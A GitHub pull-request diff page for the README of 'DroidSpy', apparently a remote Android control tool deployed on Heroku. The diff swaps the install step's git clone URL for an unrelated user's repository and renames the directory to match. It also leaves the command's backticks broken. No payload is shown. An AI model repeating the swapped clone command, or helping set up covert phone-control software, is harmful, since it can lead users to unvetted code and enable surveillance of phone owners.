Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -36,11 +36,11 @@ A cloud based remote android managment suite, powered by NodeJS

3. Now install Heroku CLI on your Computer [Instuctions](https://devcenter.heroku.com/articles/heroku-cli)

4. Now open your terminal and run command `git clone -b herooku https://github.com/Linuxndroid/DroidSpy`
4. Now open your terminal and run command `git clone -b herooku `https://github.com/MKmk123github/techmanoj62

5. It will download Latest codes for you in your PC

6. Now change the directory to DroidSpy using command `cd DroidSpy`
6. Now change the directory to DroidSpy using command `cd techmanoj62`

7. Now Login into Heroku CLI using command `heroku login -i` now enter your login details and hit Enter

Expand Down